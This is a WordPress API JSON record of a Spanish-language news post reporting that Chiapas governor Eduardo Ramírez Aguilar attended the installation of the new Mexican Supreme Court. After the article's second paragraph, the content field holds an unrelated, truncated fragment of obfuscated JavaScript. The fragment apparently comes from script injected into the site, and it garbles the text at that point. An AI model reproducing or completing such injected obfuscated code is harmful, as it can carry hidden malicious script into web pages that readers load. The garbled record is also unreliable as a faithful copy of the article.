{"id":23754,"date":"2025-09-03T03:14:18","date_gmt":"2025-09-03T03:14:18","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23754"},"modified":"2025-09-03T03:14:19","modified_gmt":"2025-09-03T03:14:19","slug":"asiste-eduardo-ramirez-a-la-sesion-solemne-de-instalacion-de-la-nueva-scjn","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23754","title":{"rendered":"Asiste Eduardo Ram\u00edrez a la Sesi\u00f3n Solemne de instalaci\u00f3n de la nueva SCJN"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"684\" data-id=\"23755\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000311055-1024x684.jpg\" alt=\"\" class=\"wp-image-23755\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000311055-1024x684.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000311055-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000311055-768x513.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000311055-1536x1025.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000311055.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"684\" data-id=\"23756\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000311058-1024x684.jpg\" alt=\"\" class=\"wp-image-23756\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000311058-1024x684.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000311058-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000311058-768x513.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000311058-1536x1025.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000311058.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>2 de septiembre del 2025. El gobernador Eduardo Ram\u00edrez Aguilar asisti\u00f3 a la Sesi\u00f3n Solemne de instalaci\u00f3n de la nueva Suprema Corte de Justicia de la Naci\u00f3n (SCJN), donde las ministras y ministros emanados del pueblo refrendaron su compromiso con la defensa de la Constituci\u00f3n y la protecci\u00f3n de los derechos de todas y todos los ciudadanos.<\/p>\n\n\n\n<p>A trav\u00e9s de sus redes sociales, el mandatario calific\u00f3 este acto como hist\u00f3rico, al considerar que marca el inicio de una nueva etapa en la impartici\u00f3n de justicia en M\u00e9xico y representa una oportunidad para fortalecer y garantizar la aplicaci\u00f3n imparcial de la ley.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>2 de septiembre del 2025. El gobernador Eduardo Ram\u00edrez Aguilar asisti\u00f3 a la Sesi\u00f3n Solemne de instalaci\u00f3n de la nueva Suprema Corte de Justicia de la Naci\u00f3n (SCJN), donde las ministras y ministros emanados del pueblo refrendaron su compromiso con la defensa de la Constituci\u00f3n y la protecci\u00f3n de los derechos de todas y todos &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23755,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-23754","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23754","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23754"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23754\/revisions"}],"predecessor-version":[{"id":23757,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23754\/revisions\/23757"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23755"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23754"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23754"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23754"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}